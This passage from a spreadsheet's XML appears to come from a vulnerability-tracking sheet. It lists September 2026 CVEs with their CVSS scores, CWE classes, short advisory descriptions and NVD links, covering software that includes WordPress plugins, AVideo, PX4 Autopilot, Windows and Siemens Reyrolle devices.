          <t>CVE-2026-84818</t>
        </is>
      </c>
      <c r="D879" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E879" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F879" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G879" s="5" t="inlineStr"/>
      <c r="H879" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I879" s="5" t="inlineStr"/>
      <c r="J879" s="5" t="inlineStr"/>
      <c r="K879" s="5" t="inlineStr"/>
      <c r="L879" s="5" t="inlineStr"/>
      <c r="M879" s="5" t="inlineStr"/>
      <c r="N879" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O879" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P879" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q879" s="5" t="inlineStr"/>
      <c r="R879" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S879" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in Open User Map &lt;= 1.4.50 versions.</t>
        </is>
      </c>
      <c r="T879" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84818</t>
        </is>
      </c>
    </row>
    <row r="880">
      <c r="A880" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B880" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C880" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84820</t>
        </is>
      </c>
      <c r="D880" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E880" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F880" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G880" s="5" t="inlineStr"/>
      <c r="H880" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I880" s="5" t="inlineStr"/>
      <c r="J880" s="5" t="inlineStr"/>
      <c r="K880" s="5" t="inlineStr"/>
      <c r="L880" s="5" t="inlineStr"/>
      <c r="M880" s="5" t="inlineStr"/>
      <c r="N880" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O880" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P880" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q880" s="5" t="inlineStr"/>
      <c r="R880" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S880" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in Unlimited Elements For Elementor (Free Widgets, Addons, Templates) &lt;= 2.0.17 versions.</t>
        </is>
      </c>
      <c r="T880" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84820</t>
        </is>
      </c>
    </row>
    <row r="881">
      <c r="A881" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B881" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C881" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86074</t>
        </is>
      </c>
      <c r="D881" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E881" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F881" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G881" s="5" t="inlineStr"/>
      <c r="H881" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I881" s="5" t="inlineStr"/>
      <c r="J881" s="5" t="inlineStr"/>
      <c r="K881" s="5" t="inlineStr">
        <is>
          <t>n8n:n8n</t>
        </is>
      </c>
      <c r="L881" s="5" t="inlineStr"/>
      <c r="M881" s="5" t="inlineStr"/>
      <c r="N881" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O881" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P881" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q881" s="5" t="inlineStr"/>
      <c r="R881" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S881" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T881" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86074</t>
        </is>
      </c>
    </row>
    <row r="882">
      <c r="A882" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B882" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C882" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86081</t>
        </is>
      </c>
      <c r="D882" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E882" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F882" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G882" s="5" t="inlineStr"/>
      <c r="H882" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I882" s="5" t="inlineStr"/>
      <c r="J882" s="5" t="inlineStr"/>
      <c r="K882" s="5" t="inlineStr"/>
      <c r="L882" s="5" t="inlineStr"/>
      <c r="M882" s="5" t="inlineStr"/>
      <c r="N882" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O882" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P882" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q882" s="5" t="inlineStr"/>
      <c r="R882" s="5" t="inlineStr">
        <is>
          <t>CWE-1333</t>
        </is>
      </c>
      <c r="S882" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T882" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86081</t>
        </is>
      </c>
    </row>
    <row r="883">
      <c r="A883" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B883" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C883" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86713</t>
        </is>
      </c>
      <c r="D883" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E883" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F883" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G883" s="5" t="inlineStr"/>
      <c r="H883" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I883" s="5" t="inlineStr"/>
      <c r="J883" s="5" t="inlineStr"/>
      <c r="K883" s="5" t="inlineStr"/>
      <c r="L883" s="5" t="inlineStr"/>
      <c r="M883" s="5" t="inlineStr"/>
      <c r="N883" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O883" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P883" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q883" s="5" t="inlineStr"/>
      <c r="R883" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S883" s="5" t="inlineStr">
        <is>
          <t>PX4 Autopilot through 1.17.0 contains a use-after-free vulnerability in the load_mon module's stop path where exit_and_cleanup() deletes the LoadMon object and frees the performance counter before perf_end() attempts to access it. Attackers can trigger this vulnerability by issuing the load_mon stop command from any PXH or MAVLink shell, causing reads and writes through freed memory that corrupt heap objects and destabilize the flight stack.</t>
        </is>
      </c>
      <c r="T883" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86713</t>
        </is>
      </c>
    </row>
    <row r="884">
      <c r="A884" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B884" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C884" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86718</t>
        </is>
      </c>
      <c r="D884" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E884" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F884" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G884" s="5" t="inlineStr"/>
      <c r="H884" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I884" s="5" t="inlineStr"/>
      <c r="J884" s="5" t="inlineStr"/>
      <c r="K884" s="5" t="inlineStr"/>
      <c r="L884" s="5" t="inlineStr"/>
      <c r="M884" s="5" t="inlineStr"/>
      <c r="N884" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O884" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P884" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q884" s="5" t="inlineStr"/>
      <c r="R884" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="S884" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains a cross-site request forgery vulnerability in deleteHistory.json.php and finishAll.json.php that allows unauthenticated attackers to mutate live history by making GET requests without CSRF token validation. Attackers can craft malicious pages that trigger administrator browsers to delete all live transmission history or mark streams as finished when an admin visits the attacker-controlled site.</t>
        </is>
      </c>
      <c r="T884" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86718</t>
        </is>
      </c>
    </row>
    <row r="885">
      <c r="A885" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B885" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C885" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86724</t>
        </is>
      </c>
      <c r="D885" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E885" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F885" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G885" s="5" t="inlineStr"/>
      <c r="H885" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I885" s="5" t="inlineStr"/>
      <c r="J885" s="5" t="inlineStr"/>
      <c r="K885" s="5" t="inlineStr"/>
      <c r="L885" s="5" t="inlineStr"/>
      <c r="M885" s="5" t="inlineStr"/>
      <c r="N885" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O885" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P885" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q885" s="5" t="inlineStr"/>
      <c r="R885" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="S885" s="5" t="inlineStr">
        <is>
          <t>AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains a cross-site request forgery vulnerability in plugin/YPTWallet/view/saveBalance.php that allows attackers to set arbitrary wallet balances by relying only on session cookies without token validation. Attackers can craft a malicious webpage that, when loaded by an administrator, submits a POST request to modify any user's wallet balance to any value.</t>
        </is>
      </c>
      <c r="T885" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86724</t>
        </is>
      </c>
    </row>
    <row r="886">
      <c r="A886" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B886" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C886" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86725</t>
        </is>
      </c>
      <c r="D886" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E886" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F886" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G886" s="5" t="inlineStr"/>
      <c r="H886" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I886" s="5" t="inlineStr"/>
      <c r="J886" s="5" t="inlineStr"/>
      <c r="K886" s="5" t="inlineStr"/>
      <c r="L886" s="5" t="inlineStr"/>
      <c r="M886" s="5" t="inlineStr"/>
      <c r="N886" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O886" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P886" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q886" s="5" t="inlineStr"/>
      <c r="R886" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S886" s="5" t="inlineStr">
        <is>
          <t>AVideo through c3edcc274c389816d434acadac07ee78eaf330c1 contains a missing authorization vulnerability in the SocialMediaPublisher plugin's add.json.php endpoint that allows authenticated users to modify other users' OAuth token records. Attackers can supply arbitrary row IDs to overwrite another user's stored access_token and refresh_token, then delete the compromised record to destroy the victim's provider linkage.</t>
        </is>
      </c>
      <c r="T886" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86725</t>
        </is>
      </c>
    </row>
    <row r="887">
      <c r="A887" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B887" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C887" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86734</t>
        </is>
      </c>
      <c r="D887" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E887" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F887" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G887" s="5" t="inlineStr"/>
      <c r="H887" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I887" s="5" t="inlineStr"/>
      <c r="J887" s="5" t="inlineStr"/>
      <c r="K887" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L887" s="5" t="inlineStr"/>
      <c r="M887" s="5" t="inlineStr"/>
      <c r="N887" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O887" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P887" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q887" s="5" t="inlineStr"/>
      <c r="R887" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S887" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT before 8.7.1 fails to validate the length of the note field in the POST /account/accept/{acceptance} endpoint, allowing authenticated users to submit unbounded input that reaches synchronous CommonMark rendering. Attackers can submit large note values to exhaust PHP worker CPU and cause denial of service through resource exhaustion in the markdown parsing pipeline.</t>
        </is>
      </c>
      <c r="T887" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86734</t>
        </is>
      </c>
    </row>
    <row r="888">
      <c r="A888" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B888" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C888" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9331</t>
        </is>
      </c>
      <c r="D888" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E888" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F888" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G888" s="5" t="inlineStr"/>
      <c r="H888" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I888" s="5" t="inlineStr"/>
      <c r="J888" s="5" t="inlineStr"/>
      <c r="K888" s="5" t="inlineStr"/>
      <c r="L888" s="5" t="inlineStr"/>
      <c r="M888" s="5" t="inlineStr"/>
      <c r="N888" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O888" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P888" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q888" s="5" t="inlineStr"/>
      <c r="R888" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S888" s="5" t="inlineStr">
        <is>
          <t>The EDD Product Catalog Feed by PixelYourSite plugin for WordPress is vulnerable to unauthorized modification of data that can lead to a denial of service due to a missing capability check on the wpeddpcf_delete_feed function in all versions up to, and including, 1.0.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to delete arbitrary option values on the WordPress site. This can be leveraged to delete an option that would create an error on the site and deny service to legitimate users.</t>
        </is>
      </c>
      <c r="T888" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9331</t>
        </is>
      </c>
    </row>
    <row r="889">
      <c r="A889" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B889" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C889" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50349</t>
        </is>
      </c>
      <c r="D889" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E889" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F889" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G889" s="5" t="inlineStr"/>
      <c r="H889" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I889" s="5" t="inlineStr"/>
      <c r="J889" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K88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89" s="5" t="inlineStr"/>
      <c r="M889" s="5" t="inlineStr"/>
      <c r="N889" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O889" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P889" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q889" s="5" t="inlineStr"/>
      <c r="R889" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="S889" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Ancillary Function Driver for WinSock allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T889" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50349</t>
        </is>
      </c>
    </row>
    <row r="890">
      <c r="A890" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B890" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C890" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58848</t>
        </is>
      </c>
      <c r="D890" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E890" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F890" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G890" s="5" t="inlineStr"/>
      <c r="H890" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I890" s="5" t="inlineStr"/>
      <c r="J890" s="5" t="inlineStr"/>
      <c r="K890" s="5" t="inlineStr"/>
      <c r="L890" s="5" t="inlineStr"/>
      <c r="M890" s="5" t="inlineStr"/>
      <c r="N890" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O890" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P890" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q890" s="5" t="inlineStr"/>
      <c r="R890" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="S890" s="5" t="inlineStr">
        <is>
          <t>In multiple functions of alloc.c, there is a possible unauthorized read/write access due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T890" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58848</t>
        </is>
      </c>
    </row>
    <row r="891">
      <c r="A891" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B891" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C891" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62653</t>
        </is>
      </c>
      <c r="D891" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E891" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F891" s="5" t="inlineStr">
        <is>
          <t>productcert@siemens.com</t>
        </is>
      </c>
      <c r="G891" s="5" t="inlineStr"/>
      <c r="H891" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I891" s="5" t="inlineStr"/>
      <c r="J891" s="5" t="inlineStr"/>
      <c r="K891" s="5" t="inlineStr"/>
      <c r="L891" s="5" t="inlineStr"/>
      <c r="M891" s="5" t="inlineStr"/>
      <c r="N891" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O891" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P891" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q891" s="5" t="inlineStr"/>
      <c r="R891" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S891" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in Reyrolle 7SR5 (All versions &lt; V2.70). The input received over a proprietary communication protocol that is exposed when the device is placed into a special firmware-update mode is not properly validated, resulting in a memory corruption condition. This could allow an unauthenticated attacker with physical access to the device to cause a crash and potentially execute arbitrary code on the device.</t>
        </is>
      </c>
      <c r="T891" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62653</t>
        </is>
      </c>
    </row>
    <row r="892">
      <c r="A892" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B892" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C892" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62654</t>
        </is>
      </c>
      <c r="D892" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E892" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F892" s="5" t="inlineStr">
        <is>
          <t>productcert@siemens.com</t>
        </is>
      </c>
      <c r="G892" s="5" t="inlineStr"/>
      <c r="H892" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I892" s="5" t="inlineStr"/>
      <c r="J892" s="5" t="inlineStr"/>
      <c r="K892" s="5" t="inlineStr"/>
      <c r="L892" s="5" t="inlineStr"/>
      <c r="M892" s="5" t="inlineStr"/>
      <c r="N892" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O892" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P892" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q892" s="5" t="inlineStr"/>
      <c r="R892" s="5" t="inlineStr">
        <is>
          <t>CWE-494</t>
        </is>
      </c>
      <c r="S892" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in Reyrolle 7SR5 (All versions &lt; V2.70). A special maintenance mode can be activated via a physical key sequence during device boot, in which the device downloads and executes program code from a network server without verifying its authenticity or integrity. This could allow an attacker with physical access to the device to upload and execute arbitrary, unsigned code.</t>
        </is>
      </c>
      <c r="T892" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62654</t>
        </is>
      </c>
    </row>
    <row r="893">
      <c r="A893" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B893" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C893" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62694</t>
        </is>
      </c>
      <c r="D893" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E893" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F893" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G893" s="5" t="inlineStr"/>
      <c r="H893" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I893" s="5" t="inlineStr"/>
      <c r="J893" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K8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93" s="5" t="inlineStr"/>
      <c r="M893" s="5" t="inlineStr"/>
      <c r="N893" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O893" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P893" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q893" s="5" t="inlineStr"/>
      <c r="R893" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S893" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Installer allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T893" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62694</t>
        </is>
      </c>
    </row>
    <row r="894">
      <c r="A894" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B894" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C894" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68824</t>
        </is>
      </c>
      <c r="D894" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E894" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F894" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G894" s="5" t="inlineStr"/>
      <c r="H894" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I894" s="5" t="inlineStr"/>
      <c r="J894" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K894" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L894" s="5" t="inlineStr"/>
      <c r="M894" s="5" t="inlineStr"/>
      <c r="N894" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O894" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P894" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q894" s="5" t="inlineStr"/>
      <c r="R894" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="S894" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Connected User Experiences and Telemetry allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T894" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68824</t>
        </is>
      </c>
    </row>
    <row r="895">
      <c r="A895" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B895" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C895" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68825</t>
        </is>
      </c>
      <c r="D895" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E895" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F895" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G895" s="5" t="inlineStr"/>
      <c r="H895" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I895" s="5" t="inlineStr"/>
      <c r="J895" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K895" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
